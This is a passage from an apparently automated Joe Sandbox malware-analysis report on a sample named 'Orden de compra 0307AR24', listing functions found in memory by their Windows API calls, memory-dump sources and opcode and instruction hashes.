                                            • Opcode Fuzzy Hash: 665772e80dd6d6f43ccacc0924b96010f06b2c78d5e7d3c29df79d24a84167a7
                                            • Instruction Fuzzy Hash: 3E1156768003499FEB10DFAAC845BEFBBF5EF88320F248419E519A7250C775A950CFA5
                                            Function 02C8B6F8 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02C8BCF9,00000800,00000000,00000000), ref: 02C8BF0A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2164372197.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2c80000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            • Opcode ID: 3ae2f4415484577e6dad8789721e90bd404546e2fbc95706f64f819bfa711918
                                            • Instruction ID: 2240aa1dbb368707e16d52a3b16d79aab3b5df8261a4884003bced926a26dbe0
                                            • Opcode Fuzzy Hash: 3ae2f4415484577e6dad8789721e90bd404546e2fbc95706f64f819bfa711918
                                            • Instruction Fuzzy Hash: BA1112B69002498FDB10DF9AC844ADEFBF4EB88318F14842EE519A7210C375A945CFA4
                                            Function 04E27788 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04E277F6
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2167665332.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4e20000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: c0588bf42667da4430e4bb1fe345fab841ffa1caa2e02cd3ba38baf708cb33dc
                                            • Instruction ID: f6106470c40225c1990eaabfde5b4fdcfff22c11a7f1f4568c0cef162ef75b06
                                            • Opcode Fuzzy Hash: c0588bf42667da4430e4bb1fe345fab841ffa1caa2e02cd3ba38baf708cb33dc
                                            • Instruction Fuzzy Hash: A61134728002499FDB10DFAAC845BDFBBF5EF88320F248419E519A7250CB75A950CFA5
                                            Function 04E271C0 Relevance: 1.6, APIs: 1, Instructions: 50threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2167665332.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4e20000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID: ResumeThread
                                            • String ID:
                                            • API String ID: 947044025-0
                                            • Opcode ID: 93da277669c22befe76e64b999fd8e9925766e149bb11b5b20ca1a0b90c55f8f
                                            • Instruction ID: e87bc1469da5c235584bf548f80241e9a32b039df418b00738606948f016920e
                                            • Opcode Fuzzy Hash: 93da277669c22befe76e64b999fd8e9925766e149bb11b5b20ca1a0b90c55f8f
                                            • Instruction Fuzzy Hash: 1C1158B18042498FEB20DFAAD8457EEBBF5AB88324F248419D159A7250CB35A940CF94
                                            Function 04E271C8 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2167665332.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4e20000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID: ResumeThread
                                            • String ID:
                                            • API String ID: 947044025-0
                                            • Opcode ID: daf52f049c6919a11f5ce3b12f432721ac20a182b9dd3aee267c9f8f136d07a5
                                            • Instruction ID: 09182c7384e84be4bc81fd43fb72e037289e58290ce6f2b695e59a5a6cd7fb12
                                            • Opcode Fuzzy Hash: daf52f049c6919a11f5ce3b12f432721ac20a182b9dd3aee267c9f8f136d07a5
                                            • Instruction Fuzzy Hash: 6F113AB19003498FDB20DFAAD8457DFFBF4EF88724F248419D519A7240CB75A540CB95
                                            Function 04E2AFB8 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • PostMessageW.USER32(?,?,?,?), ref: 04E2B01D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2167665332.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4e20000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID: MessagePost
                                            • String ID:
                                            • API String ID: 410705778-0
                                            • Opcode ID: 577937b2b36be4b0a334d3ed9cc8599796632a3b6cfd34333fed792d5889e078
                                            • Instruction ID: 893b002c3791ad51988d0baae388b8219f0857b7b6db6febf6e0263d651625e4
                                            • Opcode Fuzzy Hash: 577937b2b36be4b0a334d3ed9cc8599796632a3b6cfd34333fed792d5889e078
                                            • Instruction Fuzzy Hash: A51110B5800249DFDB10CF9AD989BDEBFF8EB48320F14841AE558A7210D375A994CFA5
                                            Function 04E29D51 Relevance: 1.5, APIs: 1, Instructions: 47comCOMMON
                                            Download Yara Rule
                                            APIs
                                            • OleInitialize.OLE32(00000000), ref: 04E29DAD
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2167665332.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4e20000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID: Initialize
                                            • String ID:
                                            • API String ID: 2538663250-0
                                            • Opcode ID: a5dbd4200b44e678181875abd269f98e45a941345ab7522a929543051a2cfaa1
                                            • Instruction ID: 309b2cca795d8246de210b3bfe0551ba7c01fcd9fc4df84f7d207d3f38b9c60e
                                            • Opcode Fuzzy Hash: a5dbd4200b44e678181875abd269f98e45a941345ab7522a929543051a2cfaa1
                                            • Instruction Fuzzy Hash: 2A1133B1900348CFDB20DFAAD485BCEBBF4EB48324F24845AD518A7200D375A584CFA5
                                            Function 02C8BC18 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 02C8BC7E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2164372197.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2c80000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: be5c742fb41af0a101ba1e4bc742400822fa5b6302a131c809f0b4b00afbc791
                                            • Instruction ID: ededc542e3e9b1f3492b22affa4c31b281753c2f9a8f138ea271fa7fac210428
                                            • Opcode Fuzzy Hash: be5c742fb41af0a101ba1e4bc742400822fa5b6302a131c809f0b4b00afbc791
                                            • Instruction Fuzzy Hash: B61110B5C007498FDB20DF9AC444ADEFBF4EB88228F10841AD519B7210C779A945CFA1
                                            Function 04E29150 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                            Download Yara Rule
                                            APIs
                                            • OleInitialize.OLE32(00000000), ref: 04E29DAD
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2167665332.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4e20000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID: Initialize
                                            • String ID:
                                            • API String ID: 2538663250-0
                                            • Opcode ID: d971fcde34e48e672c516d0e4f0ccc131254e9eb5ee132594ef23837db13a575
                                            • Instruction ID: 21d91616e0eff3262b484e1131d2ec87eab77342ff18b863616f710d14f2e4bd
                                            • Opcode Fuzzy Hash: d971fcde34e48e672c516d0e4f0ccc131254e9eb5ee132594ef23837db13a575
                                            • Instruction Fuzzy Hash: 121130B1900248CFDB20DF9AC588BDEFBF8EB48324F208459D518A7300D378A944CFA5
                                            Function 04E2AFC0 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • PostMessageW.USER32(?,?,?,?), ref: 04E2B01D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2167665332.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4e20000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID: MessagePost
                                            • String ID:
                                            • API String ID: 410705778-0
                                            • Opcode ID: ae0744c006966354f86c100d7ea9dc91ad794c8f0f179d5192515c7823e6bb09
                                            • Instruction ID: 090fffe55cff9aea85f4896212dc5ca3a703471a69a94a4ce5b3bb5c312385ee
                                            • Opcode Fuzzy Hash: ae0744c006966354f86c100d7ea9dc91ad794c8f0f179d5192515c7823e6bb09
                                            • Instruction Fuzzy Hash: 1E1103B5800349DFDB10CF9AC585BDEBBF8FB48320F108419D558A7200C375A594CFA1
                                            Function 058B7CE2 Relevance: .2, Instructions: 197COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d4bc00dbe00ef02ef4e1a1c5a95502e3b1e144594de911b2a656bb993c743861
                                            • Instruction ID: 10871e50c011b26f5b59821b9d86a051d7b3b3e63ac25d01c1973b10c798d88e
                                            • Opcode Fuzzy Hash: d4bc00dbe00ef02ef4e1a1c5a95502e3b1e144594de911b2a656bb993c743861
                                            • Instruction Fuzzy Hash: 45811574600A04CFD709EF38C458A9AB7E6EF89301B1185ADD51A8B371EF35AD46CB91
                                            Function 058B7CF0 Relevance: .2, Instructions: 196COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 67b028436c33de63ffea59de46d1b79f23362949fe655444351ae412ea8a3c6b
                                            • Instruction ID: 030379b43fc20f431aa3410d80e62c33f1cd80e162b80541f3b8fc83492d82a6
                                            • Opcode Fuzzy Hash: 67b028436c33de63ffea59de46d1b79f23362949fe655444351ae412ea8a3c6b
                                            • Instruction Fuzzy Hash: DE811474600A04CFD709EB38C458A9AB7E6EF89301B1085ADD51A8B371EF75AD86CB91
                                            Function 058BA266 Relevance: .1, Instructions: 141COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 18f03d1eff57f06a5e87895637008725b6e4968df4365e213dc739f32fe16e66
                                            • Instruction ID: b070dbe45df572277571c1935b75c7068b0d7cce54104fcfda30b1fafbe5b34d
                                            • Opcode Fuzzy Hash: 18f03d1eff57f06a5e87895637008725b6e4968df4365e213dc739f32fe16e66
                                            • Instruction Fuzzy Hash: 7B51DEB4909788CFD316CB69E554A58BFF0FF8A201B2A81DAC884DB273C7759D05CB12
                                            Function 058B9529 Relevance: .1, Instructions: 138COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 79c3818c5723cb488d3fad25322412aa1fa6d7cadc73fd3e5dc9a587ab226d6b
                                            • Instruction ID: 2cc5285b2a943b2c039a80143205120295c11358519a533ae95b86ce42262d13
                                            • Opcode Fuzzy Hash: 79c3818c5723cb488d3fad25322412aa1fa6d7cadc73fd3e5dc9a587ab226d6b
                                            • Instruction Fuzzy Hash: BB516E34B412089FEB149F74D855BAE7AA3BF88700F208069E906EB3A5DE75DD418B50
                                            Function 058B9563 Relevance: .1, Instructions: 136COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9caec96c345133d091ebaba815081a082008b1f3b3d8859ed8b4e6a3124b5920
                                            • Instruction ID: e35ee308dfbe7a1010bc404adb761225ffc14c8cbb96b82c8ab2ff7e1842075c
                                            • Opcode Fuzzy Hash: 9caec96c345133d091ebaba815081a082008b1f3b3d8859ed8b4e6a3124b5920
                                            • Instruction Fuzzy Hash: AE418D34B412089FEB149F74D855BAE7AA3FF88700F208069EA06EB3A5DE75DD418B50
                                            Function 058BA41F Relevance: .1, Instructions: 121COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e2d45c7a408198a08873697f22d2a6885f456753e5db9911b7e217098cb2ddf6
                                            • Instruction ID: 8df7b3d9e88654fb454a97912fef4d725e5a2c99ead1a54cae0d6eb16527e8c7
                                            • Opcode Fuzzy Hash: e2d45c7a408198a08873697f22d2a6885f456753e5db9911b7e217098cb2ddf6
                                            • Instruction Fuzzy Hash: 06410474E0921DDFDB18CFA8E4889EEBBB9FB4D204B015859D856E7312D7B09E10CB25
                                            Function 058BA430 Relevance: .1, Instructions: 117COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 027c3885df5369431cc3b343fe195e9fb3a56042895edfc14c18f2c8efa6ab3e
                                            • Instruction ID: 52356d041586a080843eddeb4a063a7e9324a4dd8f05d803e57c552f7a3cf030
                                            • Opcode Fuzzy Hash: 027c3885df5369431cc3b343fe195e9fb3a56042895edfc14c18f2c8efa6ab3e
                                            • Instruction Fuzzy Hash: B9410474D0521DDFDB08CFA8E4888EEBBB9FB4D204B415855D816E7311D7B0AE50CB25
                                            Function 058BACF3 Relevance: .1, Instructions: 108COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6f49232554268457d3d3dc6c5e419160a4aff4ff33b57546986785717edf8f40
                                            • Instruction ID: c50e58bfa29074434d4c58c89e5cf8c4f3d58671fd6faf82d3a4311758c2883a
                                            • Opcode Fuzzy Hash: 6f49232554268457d3d3dc6c5e419160a4aff4ff33b57546986785717edf8f40
                                            • Instruction Fuzzy Hash: 3F419974E0021D9FDB18CFA9D884AEDBBB6BB0A201F14A415E85AF7310D7759D41CF24
                                            Function 058BA5AE Relevance: .1, Instructions: 104COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2a4db44dda996ffbda9767c760cc1091470445fc6331c0b64501c2829d07b600
                                            • Instruction ID: 43612940ddea42fb3de64104a0042a6768ec75c7e698c68ed8f179c398f6b304
                                            • Opcode Fuzzy Hash: 2a4db44dda996ffbda9767c760cc1091470445fc6331c0b64501c2829d07b600
                                            • Instruction Fuzzy Hash: 3541E274E0821DDFEB18CFA8E4848EDBBB9FB4D204B415455E856E7311D7B09E508F25
                                            Function 058BC184 Relevance: .1, Instructions: 100COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ecbedc9baa2ca315e42f78e7760db5945574f78d36584bd62fc434d9d6ac432e
                                            • Instruction ID: 77f0d4b6c6d01caeb27189fd4e145c83ecfaa385814798022349e004dec9b693
                                            • Opcode Fuzzy Hash: ecbedc9baa2ca315e42f78e7760db5945574f78d36584bd62fc434d9d6ac432e
                                            • Instruction Fuzzy Hash: 2D317A75904209AFDB10DFA9D844ADEBFF9FB48310F14842AE919E7310D774A944CFA4
                                            Function 058B8544 Relevance: .1, Instructions: 84COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 268761b7c2ec69af742cee045e8cfca1ce347b1a8f8ec254d8fba64b5468574b
                                            • Instruction ID: 4394bcf770555a673f1be8293f6cf377e2b95315ffcaccc5fbaa0ac847d7e944
                                            • Opcode Fuzzy Hash: 268761b7c2ec69af742cee045e8cfca1ce347b1a8f8ec254d8fba64b5468574b
                                            • Instruction Fuzzy Hash: 4421B535B003054FEB15EB7998585BF7BBBFBC5250B144929E816D7380DE708D058762
                                            Function 02BDD4C4 Relevance: .1, Instructions: 75COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2163740547.0000000002BDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BDD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2bdd000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6c7cc8ab6535b86c74a27963a3ddd9ebc25c3d9ec63d71418ca4c9bfe46b763a
                                            • Instruction ID: 35ecb118c51a39756824a73d58a421defd0ef056f196531961ea5e8496a1a43d
                                            • Opcode Fuzzy Hash: 6c7cc8ab6535b86c74a27963a3ddd9ebc25c3d9ec63d71418ca4c9bfe46b763a
                                            • Instruction Fuzzy Hash: 87210372500242EFDB05DF14D9C0B66BF65FB8831CF24C5A9E9490B257D336E456CBA1
                                            Function 02BED01C Relevance: .1, Instructions: 72COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2163845480.0000000002BED000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BED000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2bed000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b98109d6aa9cd6f211f46ebced5383e4733bf6ef860519dd69783a7f9c298e3f
                                            • Instruction ID: 5a028d4de77b9add195507d8a240f9e4db9cb0c85b085f252c6241329231e9f4
                                            • Opcode Fuzzy Hash: b98109d6aa9cd6f211f46ebced5383e4733bf6ef860519dd69783a7f9c298e3f
                                            • Instruction Fuzzy Hash: 8E212271604201DFDF14DF14D990B16BB69FB84314F28C5ADE80A4B293C3BAD447CA61
                                            Function 02BED1D4 Relevance: .1, Instructions: 72COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2163845480.0000000002BED000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BED000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2bed000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a468d957c394d1fdfb95be3f9183d1e89250611d89c5900cf91783db4b46fdba
                                            • Instruction ID: 89b05f493e5a130f4ac067231e1bc399884c243b3df8c412ac9ada319353fcc0
                                            • Opcode Fuzzy Hash: a468d957c394d1fdfb95be3f9183d1e89250611d89c5900cf91783db4b46fdba
                                            • Instruction Fuzzy Hash: 0C212675604205EFDF05DF14D9C0B26BBA9FB88314F20C6ADE98B4B292C3B6D446CB61
                                            Function 058B8EC1 Relevance: .1, Instructions: 72COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 385ca28eb76757e419dd697e78c1ba57da8d78efd0c495dc6636ae78fe783fb5
                                            • Instruction ID: 8ae25bcc9cfffac3a0d3b230799804f3e5eea77f0461f82457af43d114f03f0d
                                            • Opcode Fuzzy Hash: 385ca28eb76757e419dd697e78c1ba57da8d78efd0c495dc6636ae78fe783fb5
                                            • Instruction Fuzzy Hash: 2721D132A002499FDF10DFA5DC417EEBBB9FF45300F1444A6E454EB282E674AA06CB90
                                            Function 058B86F8 Relevance: .1, Instructions: 72COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7faa13572b9927291ac5d6b51eda75d3e6e1f37e81df86760022382fffcb76bb
                                            • Instruction ID: 0823b59d996bafe6b28d324f07b60715a11d833896f6806db20cb8f7112eabd6
                                            • Opcode Fuzzy Hash: 7faa13572b9927291ac5d6b51eda75d3e6e1f37e81df86760022382fffcb76bb
                                            • Instruction Fuzzy Hash: 352129343006118FEB58EB39C454A6A77EEEF85719B2084ADD906CB3A1DBB1DC46CF54
                                            Function 058B7FB0 Relevance: .1, Instructions: 70COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 63ad879e7128cf3be65c066131c5affce60aab3bdf9237d3606b65642a1f1d2e
                                            • Instruction ID: fc2e89adef9a3349a47d4471f66e1e7d79286728779d4b8f73219e1374e040ba
                                            • Opcode Fuzzy Hash: 63ad879e7128cf3be65c066131c5affce60aab3bdf9237d3606b65642a1f1d2e
                                            • Instruction Fuzzy Hash: 8C21AC756007548BD720CF68C8809BBBBB9FF89700B00846DE9198B320E730AD05CBA1
                                            Function 058B86EA Relevance: .1, Instructions: 70COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f5d527bacb3dea7b08588a9699612ceb2af1e9775e47a3a19238b5b24bb2135c
                                            • Instruction ID: 16cbf8ea703e6ded12ce99fe0c1645cfd44e01ed774429332706ee85a6fb14b5
                                            • Opcode Fuzzy Hash: f5d527bacb3dea7b08588a9699612ceb2af1e9775e47a3a19238b5b24bb2135c
                                            • Instruction Fuzzy Hash: 2D2138343006108FEB14EB38C454AA973AABF85719B2484AED906DB3A1DBB1DC42CF54
                                            Function 058BC57E Relevance: .1, Instructions: 67COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b3b9835f84ea233ce0817f6e503ac414116841cb29b047659c9d99ceb7edc463
                                            • Instruction ID: c08a5fd4149547d389ec19400c3ef34cfc2407a183c7204efa8020e9a0a0ff40
                                            • Opcode Fuzzy Hash: b3b9835f84ea233ce0817f6e503ac414116841cb29b047659c9d99ceb7edc463
                                            • Instruction Fuzzy Hash: DF31BFB0C012589FEB20DFA9C584BDEBFB5AB49714F24845AE804AB350C7B55885CF94
                                            Function 058BBFC4 Relevance: .1, Instructions: 67COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: df3db29fb01dedd9a2a50940ac39cbd843681689154be7b59ae02ee4a38cb738
                                            • Instruction ID: 30d598fb4778f03a9a984500df74096bf4d102fed7a318e05bbdd64426bab8b9
                                            • Opcode Fuzzy Hash: df3db29fb01dedd9a2a50940ac39cbd843681689154be7b59ae02ee4a38cb738
                                            • Instruction Fuzzy Hash: 2631B1B0C01219DBEB20DF99C588BDEBBF9BB49714F24845AE804AB350C7B55945CF94
                                            Function 058BC11C Relevance: .1, Instructions: 67COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 196821150604dbf794acfa7cd0440b9389e49dffc3ee6afb37e4fd718516059d
                                            • Instruction ID: 7e1818e5b9372ce304f4a7f717b065d3c99876348eacf5f893213b3a0a879169
                                            • Opcode Fuzzy Hash: 196821150604dbf794acfa7cd0440b9389e49dffc3ee6afb37e4fd718516059d
                                            • Instruction Fuzzy Hash: 24110164B09344AFEB06EF748829BE97BB9AB02100F1088EAEC49D3341E970DD069761
                                            Function 058B8540 Relevance: .1, Instructions: 61COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4ea5167bea0c6f4f0ddfebbab3e93da9a24b41f28f5fe75184df405964b1e341
                                            • Instruction ID: 37a6764711d521d51601965e0ccbd6d9fc46d4ae26f23625c5da543fde9a5b8e
                                            • Opcode Fuzzy Hash: 4ea5167bea0c6f4f0ddfebbab3e93da9a24b41f28f5fe75184df405964b1e341
                                            • Instruction Fuzzy Hash: A211E375B0031A8F9B11DB7988489BFB6FBFFC82617144929E819D3344EFB09D058B62
                                            Function 058BA358 Relevance: .1, Instructions: 61COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
